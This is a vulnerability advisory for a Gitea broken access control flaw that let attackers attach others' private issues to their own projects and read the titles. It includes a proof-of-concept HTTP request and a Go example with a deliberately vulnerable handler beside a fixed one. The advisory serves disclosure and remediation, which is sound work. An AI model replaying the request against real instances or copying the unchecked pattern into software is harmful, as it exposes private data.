CVE-2022-38183: usd-2022-0015 | Broken Access Control in Gitea - usd HeroLab

In Gitea before 1.16.9, it was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea (there was no permission check for fetching the issue). As a result, the attacker would get access to private issue titles.


Advisory ID: usd-2022-0015
Product: Gitea
Affected Version: < 1.16.9
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Pending
CVE Link: Pending
First Published: 2022-08-12
Last Update: 2022-08-12

Description

Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea. As a result, the attacker would get access to private issue titles.

Proof of Concept

In the example below, the issue with ID 7 belongs to a private repository of another user, and the project with ID 3 is the attacker's own project.

POST /testuser/test222/issues/projects HTTP/1.1
Host: localhost:3000
Content-Length: 85
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close

_csrf=tvK_ourfR_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue_ids=7&id=3

The attacker can see the issue (without body text).

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.
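To make the recommended fix concrete, the following Go program is an added illustration written for this advisory; it is not Gitea's code and its types, store and permission helpers are a simplified, constructed model. It places the flawed flow described above (issues are fetched by ID with no permission check before being attached to a project) beside a version that verifies, before changing any state, that the caller may read the repository each issue belongs to and may write to the repository the project belongs to. The sample data mirrors the advisory's scenario: issue 7 lives in another user's private repository, project 3 belongs to the attacker.

```go
package main

import (
	"errors"
	"fmt"
)

// Constructed in-memory model for illustration only; these are not Gitea's types.
type Repo struct {
	ID            int
	Owner         string
	Private       bool
	Collaborators map[string]bool
}

type Issue struct {
	ID     int
	RepoID int
	Title  string
}

type Project struct {
	ID       int
	RepoID   int
	IssueIDs []int
}

type Store struct {
	Repos    map[int]*Repo
	Issues   map[int]*Issue
	Projects map[int]*Project
}

var (
	ErrNotFound  = errors.New("not found")
	ErrForbidden = errors.New("forbidden")
)

// canWrite: only the owner or a collaborator may change a repository's projects.
func (s *Store) canWrite(user string, repoID int) bool {
	r, ok := s.Repos[repoID]
	return ok && (r.Owner == user || r.Collaborators[user])
}

// canRead: public repositories are readable by anyone, private ones only by
// users who could also write to them.
func (s *Store) canRead(user string, repoID int) bool {
	r, ok := s.Repos[repoID]
	return ok && (!r.Private || s.canWrite(user, repoID))
}

// AddIssuesToProjectVulnerable models the flaw in the advisory: the caller's
// right to the project is checked, but each issue is fetched by ID with no
// permission check, so any issue on the instance can be attached and its
// title (returned here, shown on the board in the real product) leaks.
func (s *Store) AddIssuesToProjectVulnerable(user string, projectID int, issueIDs []int) ([]string, error) {
	p, ok := s.Projects[projectID]
	if !ok {
		return nil, ErrNotFound
	}
	if !s.canWrite(user, p.RepoID) {
		return nil, ErrForbidden
	}
	var titles []string
	for _, id := range issueIDs {
		iss, ok := s.Issues[id]
		if !ok {
			return nil, ErrNotFound
		}
		p.IssueIDs = append(p.IssueIDs, iss.ID)
		titles = append(titles, iss.Title)
	}
	return titles, nil
}

// AddIssuesToProjectFixed adds the missing check: the caller must be allowed
// to read the repository each issue belongs to. All checks run before any
// state changes, so one forbidden ID rejects the whole request. A missing
// issue and an unreadable issue yield the same error so the response does
// not reveal whether a private issue ID exists.
func (s *Store) AddIssuesToProjectFixed(user string, projectID int, issueIDs []int) ([]string, error) {
	p, ok := s.Projects[projectID]
	if !ok {
		return nil, ErrNotFound
	}
	if !s.canWrite(user, p.RepoID) {
		return nil, ErrForbidden
	}
	issues := make([]*Issue, 0, len(issueIDs))
	for _, id := range issueIDs {
		iss, ok := s.Issues[id]
		if !ok || !s.canRead(user, iss.RepoID) {
			return nil, ErrForbidden
		}
		issues = append(issues, iss)
	}
	titles := make([]string, 0, len(issues))
	for _, iss := range issues {
		p.IssueIDs = append(p.IssueIDs, iss.ID)
		titles = append(titles, iss.Title)
	}
	return titles, nil
}

// NewSampleStore builds constructed data matching the advisory's scenario.
func NewSampleStore() *Store {
	return &Store{
		Repos: map[int]*Repo{
			1: {ID: 1, Owner: "victim", Private: true, Collaborators: map[string]bool{}},
			2: {ID: 2, Owner: "attacker", Private: false, Collaborators: map[string]bool{}},
		},
		Issues: map[int]*Issue{
			7: {ID: 7, RepoID: 1, Title: "Private roadmap (constructed)"},
			8: {ID: 8, RepoID: 2, Title: "Attacker's own issue (constructed)"},
		},
		Projects: map[int]*Project{3: {ID: 3, RepoID: 2}},
	}
}

func main() {
	s := NewSampleStore()
	titles, err := s.AddIssuesToProjectVulnerable("attacker", 3, []int{7})
	fmt.Println("vulnerable:", titles, err) // leaks the private title
	titles, err = s.AddIssuesToProjectFixed("attacker", 3, []int{7})
	fmt.Println("fixed:", titles, err) // [] forbidden
}
```

The design point is the one the Fix section states: the object fetched as a side input (the issue) needs the same authorization check as the object the request nominally targets (the project), and the check belongs in a shared access-control helper rather than in each handler, so that a new endpoint cannot forget it.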

References

  • https://cwe.mitre.org/data/definitions/284.html
  • https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/

Timeline

  • 2022-06-22: vulnerability identified by Christian Pöschl
  • 2022-06-22: First contact request
  • 2022-07-01: Investigation started by vendor
  • 2022-07-12: Gitea 1.16.9 is released, the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/
  • 2022-07-15: Vendor confirms remediation
  • 2022-08-12: This advisory is published

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.
